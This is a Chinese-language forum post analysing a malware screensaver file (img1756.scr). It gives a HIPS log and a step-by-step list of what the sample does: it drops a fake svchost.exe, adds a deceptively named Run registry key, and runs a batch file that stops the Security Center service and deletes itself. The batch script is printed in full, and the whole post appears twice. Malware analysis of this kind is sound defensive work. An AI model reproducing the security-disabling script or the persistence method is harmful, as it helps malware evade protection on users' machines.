Roger
2007-08-08, 10:31 AM
運行img1756.scr,發現下列行為,被EQ-Secure V3.4攔截!
2007-08-08 08:48:45 運行應用程序 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:D:\desktop\virus\img1756\img1756.scr
命令行:/S
觸發規則:所有程序規則->*
2007-08-08 08:48:46 修改其它進程內存 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
目標進程:D:\desktop\virus\img1756\img1756.scr
觸發規則:所有程序規則->*
2007-08-08 08:48:54 創建文件 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:C:\a.bat
觸發規則:所有程序規則->全局設置_可執行文件1_普通模式->%SystemDrive%\*.bat
2007-08-08 08:48:54 運行應用程序 操作:阻止
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:C:\windows\system32\cmd.exe
命令行:/c ""c:\a.bat" "
觸發規則:所有程序規則->系統程序->%windir%\system32\cmd.exe
2007-08-08 08:48:55 創建文件 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:C:\windows\img1756.zip
觸發規則:所有程序規則->全局設置_普通模式->%SystemDrive%\*
2007-08-08 08:48:57 創建文件 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:C:\windows\svchost.exe
觸發規則:所有程序規則->全局設置_可執行文件1_普通模式->%SystemDrive%\*.exe
2007-08-08 08:48:57 創建注冊表值 操作:阻止
進程路徑:D:\desktop\virus\img1756\img1756.scr
注冊表路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
注冊表名稱:Microsoft Genuine Logon
注冊表數據:svchost.exe
觸發規則:所有程序規則->自動運行_普通模式->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*
2007-08-08 08:48:58 運行應用程序 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:C:\windows\svchost.exe
觸發規則:所有程序規則->*
2007-08-08 08:49:00 運行應用程序 操作:允許
進程路徑:C:\windows\svchost.exe
文件路徑:C:\windows\svchost.exe
觸發規則:所有程序規則->*
2007-08-08 08:49:02 修改其它進程內存 操作:允許
進程路徑:C:\windows\svchost.exe
目標進程:C:\windows\svchost.exe
觸發規則:所有程序規則->*
2007-08-08 08:49:13 修改文件 操作:阻止
進程路徑:C:\windows\svchost.exe
文件路徑:C:\a.bat
觸發規則:所有程序規則->全局設置_可執行文件1_普通模式->%SystemDrive%\*.bat
2007-08-08 08:49:13 運行應用程序 操作:阻止
進程路徑:C:\windows\svchost.exe
文件路徑:C:\windows\system32\cmd.exe
命令行:/c ""c:\a.bat" "
觸發規則:所有程序規則->系統程序->%windir%\system32\cmd.exe
2007-08-08 08:49:13 修改文件 操作:阻止
進程路徑:C:\windows\svchost.exe
文件路徑:C:\windows\img1756.zip
觸發規則:所有程序規則->全局設置_普通模式->%SystemDrive%\*
2007-08-08 08:49:34 運行應用程序 操作:阻止
進程路徑:C:\windows\system32\svchost.exe
文件路徑:C:\Program Files\MSN Messenger\msnmsgr.exe
命令行:-Embedding
觸發規則:所有程序規則->*
1.它會運行自己
命令行:/S
2.它會修改自己的進程內存
3.它會生成
C:\a.bat
4.它會運行C:\windows\system32\cmd.exe
命令行:/c ""c:\a.bat" "
5.它會生成
C:\windows\img1756.zip
C:\windows\svchost.exe
6.它會創建注冊表值
注冊表路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
注冊表名稱:Microsoft Genuine Logon
注冊表數據:svchost.exe
7.它會運行C:\windows\svchost.exe
8.svchost.exe會運行自己
9.svchost.exe會修改自己的進程內存
10.svchost.exe會修改C:\a.bat
11.svchost.exe會運行C:\windows\system32\cmd.exe
命令行:/c ""c:\a.bat" "
12.svchost.exe會修改C:\windows\img1756.zip
13.正牌的svchost.exe會運行C:\Program Files\MSN Messenger\msnmsgr.exe
命令行:-Embedding
a.bat的結構
@echo off
net stop "Security Center"
net stop winvnc4
del c:\a.bat
贊助商連結
2007-08-08 08:48:45 運行應用程序 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:D:\desktop\virus\img1756\img1756.scr
命令行:/S
觸發規則:所有程序規則->*
2007-08-08 08:48:46 修改其它進程內存 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
目標進程:D:\desktop\virus\img1756\img1756.scr
觸發規則:所有程序規則->*
2007-08-08 08:48:54 創建文件 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:C:\a.bat
觸發規則:所有程序規則->全局設置_可執行文件1_普通模式->%SystemDrive%\*.bat
2007-08-08 08:48:54 運行應用程序 操作:阻止
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:C:\windows\system32\cmd.exe
命令行:/c ""c:\a.bat" "
觸發規則:所有程序規則->系統程序->%windir%\system32\cmd.exe
2007-08-08 08:48:55 創建文件 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:C:\windows\img1756.zip
觸發規則:所有程序規則->全局設置_普通模式->%SystemDrive%\*
2007-08-08 08:48:57 創建文件 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:C:\windows\svchost.exe
觸發規則:所有程序規則->全局設置_可執行文件1_普通模式->%SystemDrive%\*.exe
2007-08-08 08:48:57 創建注冊表值 操作:阻止
進程路徑:D:\desktop\virus\img1756\img1756.scr
注冊表路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
注冊表名稱:Microsoft Genuine Logon
注冊表數據:svchost.exe
觸發規則:所有程序規則->自動運行_普通模式->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*
2007-08-08 08:48:58 運行應用程序 操作:允許
進程路徑:D:\desktop\virus\img1756\img1756.scr
文件路徑:C:\windows\svchost.exe
觸發規則:所有程序規則->*
2007-08-08 08:49:00 運行應用程序 操作:允許
進程路徑:C:\windows\svchost.exe
文件路徑:C:\windows\svchost.exe
觸發規則:所有程序規則->*
2007-08-08 08:49:02 修改其它進程內存 操作:允許
進程路徑:C:\windows\svchost.exe
目標進程:C:\windows\svchost.exe
觸發規則:所有程序規則->*
2007-08-08 08:49:13 修改文件 操作:阻止
進程路徑:C:\windows\svchost.exe
文件路徑:C:\a.bat
觸發規則:所有程序規則->全局設置_可執行文件1_普通模式->%SystemDrive%\*.bat
2007-08-08 08:49:13 運行應用程序 操作:阻止
進程路徑:C:\windows\svchost.exe
文件路徑:C:\windows\system32\cmd.exe
命令行:/c ""c:\a.bat" "
觸發規則:所有程序規則->系統程序->%windir%\system32\cmd.exe
2007-08-08 08:49:13 修改文件 操作:阻止
進程路徑:C:\windows\svchost.exe
文件路徑:C:\windows\img1756.zip
觸發規則:所有程序規則->全局設置_普通模式->%SystemDrive%\*
2007-08-08 08:49:34 運行應用程序 操作:阻止
進程路徑:C:\windows\system32\svchost.exe
文件路徑:C:\Program Files\MSN Messenger\msnmsgr.exe
命令行:-Embedding
觸發規則:所有程序規則->*
1.它會運行自己
命令行:/S
2.它會修改自己的進程內存
3.它會生成
C:\a.bat
4.它會運行C:\windows\system32\cmd.exe
命令行:/c ""c:\a.bat" "
5.它會生成
C:\windows\img1756.zip
C:\windows\svchost.exe
6.它會創建注冊表值
注冊表路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
注冊表名稱:Microsoft Genuine Logon
注冊表數據:svchost.exe
7.它會運行C:\windows\svchost.exe
8.svchost.exe會運行自己
9.svchost.exe會修改自己的進程內存
10.svchost.exe會修改C:\a.bat
11.svchost.exe會運行C:\windows\system32\cmd.exe
命令行:/c ""c:\a.bat" "
12.svchost.exe會修改C:\windows\img1756.zip
13.正牌的svchost.exe會運行C:\Program Files\MSN Messenger\msnmsgr.exe
命令行:-Embedding
a.bat的結構
@echo off
net stop "Security Center"
net stop winvnc4
del c:\a.bat
贊助商連結